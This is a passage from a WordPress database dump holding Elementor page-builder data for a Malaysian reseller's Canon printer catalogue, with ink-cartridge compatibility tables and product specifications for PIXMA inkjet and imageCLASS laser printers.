width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7000,3313,'_elementor_version','2.5.14'),(7003,3314,'_wp_page_template','template-fullwidth.php'),(7004,3314,'_elementor_edit_mode','builder'),(7005,3314,'_elementor_template_type','post'),(7006,3314,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS 